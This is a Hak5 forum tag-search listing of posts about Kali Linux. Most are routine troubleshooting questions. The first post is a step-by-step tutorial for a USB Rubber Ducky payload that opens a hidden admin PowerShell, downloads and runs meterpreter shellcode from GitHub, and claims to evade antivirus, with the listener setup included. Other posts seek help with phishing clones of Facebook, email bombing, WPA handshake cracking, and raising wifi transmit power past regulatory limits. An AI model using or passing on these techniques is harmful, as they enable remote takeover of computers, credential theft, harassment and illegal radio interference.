Jump to content

Search the Community

Showing results for tags 'kali linux'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  2. The website cloner is not working for external viewers to my IP, it works from the host computer but no other one, I am quite new to this and would like a detailed responce on how I make it work for external clients visiting the IP. ~Thankyou
  3. So I have been following this tutorial: https://m.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux#step_2_17 And I haven't been able to get any WPA handshake. I use Kali Linux (latest 64-bit) on a live usb stick (8GB).
  4. Hello. I was trying to run iso kali linux in virtual box but it couldn't install right and my system was freezing during installation. So, i tried ova file of Kali that was fine to install and run at virtual box. Everyrhing was fine with that ova file of Kali Linux in virtual box until i tried to get Kali updated and upgrated. During this process the system was freezing so i closed the machine at virtual machine. When i tried to run again Kali it was like something changed.. no icons and it was asking me all the time to enter username and password. I deleted Kali Linux and tried to create a new project on vm but vm didnt recognize/appear that Kali Linux ova file anymore. Frist question.. is it possible to run Kali Linux iso file with VB or it must be the ova file which is for VB? Second question. After update and upgrade is it possible that it ruined my ova file and thats why vb can find it anymore and open it? Thanks.
  5. Hi im new programmer and I'm only training step now. But i do every day tutorial videos in youtube! Android, Kali Linux , and Windows program installing, how use programs and what u can do the programs what i use. I need audience comments how i can make better videos and to become better at programming!! This is my youtube channel link. If you need help videos or something help i do them for you and upload videos in youtube. And sorry my bad english im from Finland and i learning english now so so hard!!
  6. ipman92

    need help

    hello hak5 users. I'm new to this forum and want to expand my knowledge in the technical field. Anyways I have a tech problem that I need help with, so I downloaded a VM player 15 and every time I start up the kali Linux it gives me a login screen even though I never setup the user/password and I'm wondering if there's like a default user and password??
  7. Im trying to download Kali linux on my brand new Chormebook(ASUS). I started by downloading crouton and setting that up, next i go to the crosh and type: shell sudo sh -e ~/Downloads/crouton -r kali-rolling -t xfce than it said a buch of stuff than at the end said Failed to complete chroot setup.
  8. First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me out here i can't open msfconsole.!😥
  9. An extremely asked theme is how to hack an wifi network easily, today i has the answer to you question totally free. Today is possible to attach a kali linux to your windows totally free and by a quickly mode, using Virtual Box the work is dis complicated. In the link bellow i taught how to hack any wifi with any operational system. You can ask for help in the post comments... Click here to go to article
  10. I have been faced by this problem , Handshake packet didnt showing plzzz some one guide me or help me to do I have follow these steps: 1. airmon-ng check kill 2. airmon-ng start wlan0 (here shows my realink adapter interface is wlan1mon) 3. airodump-ng wlan1mon 4.airodump-ng --bssid (target bssid) -c (chanel no of target) -w /root/Desktop/filename wlan1mon 5.aireplay-ng --deauth 10 -a (bssid same as above i paste in 4th step) wlan1mon All is gone good here deauth packets send But above there the handshake is not been shown I do this method yesterday and it was sucessfully done but now today i not work CAN SOMEONE PLZZ HELP ME ...!
  11. Hey, I just reinstalled Kali Linux KDE on my machine, and I have problems with putting some widgets on the desktop and panel (like the system tray) and I can't right click on the desktop to add a panel. Can someone help me?
  12. Hello community, Nice to be hear. I just wondered is their a more effective way of email bombing than I am currently doing? I have a simple home made python script which allows me to connect to a Google account I create ( Basic I know ) I am trying to work on over Email provider support. But anyway... I can't get past the " Text only input " is there a way to send files in email bomb attacks? Also how would this be done and is there a way to get past the terminal from cutting out due to the server closing the connection? is this due to the email service closing due to the volume of emails? if so is there a way I could logically delay the time between messages? Lastly all my emails come through to the same email. How can I get it to create a new email ( conversation ) each email? would it be a simple character var and change on each send? how would i implement this?
  13. Hello! I have a question. Is it possbile to hack someone who is not on Wi-Fi? Like I am in Poland and I am hacking guy from Spain or USA. I want this way on Kali Linux. ?
  14. Hi, So I have this Surface laptop(not surface pro or surface book, a surface laptop) and I decided to download Kali Linux on it. I'm using a live USB to run it and everything works until i try and type something. The mouse and everything works except for the keyboard, which is unresponsive. I've tried using a USB keyboard but that doesn't work either, and I've spent almost an entire day racking the internet, but there's nothing for the Surface Laptop. I have a surface laptop with an i5 processor, 8gb RAM 256gb Storage and I'm suing a GB USB drive. Any Help is appreciated!
  15. I have an ath10k wireless card in my laptop. On boot I get errors about the firmware not being able to load, but I can still use the internet. Its not until my laptop goes to sleep that I can no access the internet. After the suspension, my wireless card cannot be seen in iwconfig. I'm guessing this is a firmware issue and would appreciate some help.
  16. Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with „msfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance
  17. Hi i have been very interested in the idea of being a pen tester, I have messed around with Kali Linux a few times before and I am setting up a laptop to run its primary OS as Kali Linux. One day i will be joining my countries defence force and will hope to make my way up in the security field and work for my county in intelligence. I am haven't even scratched the surface on how to pen test and use linux with ease. If anyone could send me in the right direction to start learning I would be extremely grateful. I also understand the task i wish to take on is not easy, I know that i will have to put in a lot of work to get to where i want.
  18. I need a USB wifi adapter for Kali Linux penetration testing. I have two options: 1) Panda and 2) Alfa. I know Alfa is excellent for high range wireless connection. But, it is too costly. So, help me which one is worthy.
  19. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 benh@debian.org.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  20. Mr.many

    I NEED HELP

    I need help with gparted I keep getting this error ** (gparted bin : 1927) : CRITICAL **: murrine_style_draw_box: assertion 'height >= -1 ' failed
  21. What recommendations would you make for a noobs pentest lab? i currently have virtualbox running Kali, metasploitable, couple of Linux distro’s all on a internal network(virtualbox). Is there a simple solution to virtualise embedded system e.g. the firmware from my router? i know there is this thing called google....but would like guidance from people who are knowledgeable in this area. Any advise will be gratefully received, including recommended reading. Im not asking anyone to do it for me, just guide me in the right direction please. This is purely a obsession/hobby for me.
  22. hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!
  23. So I had some issues happen in the video but it just turns out I remembered things wrong although it still all works out in the end so I hope you all enjoy the video on this tool. Also I do a slight comparison of the node mcu vs aireplay.
  24. Hello, when im creating a fake facebook page with my local ip, everything is alright. But i also want people from outside to be able to access my cloned website so i used my public ip but the problem is, that it isnt opening up my fake facebook page but my routers page. Why is this? How can i access my cloned website with my public ip? Thx
  25. Hi, I have a nexus 5 and I've installed Kali nethunter on there with no problems but I've tried to run commands such as apt-get update, apt-get install ect.. but it always says err 404 and the E: failed to fetch some archives maybe run apt-get update or try with --fix-missing? Can anyone please help explain how I can fix this, thanks
×
×
  • Create New...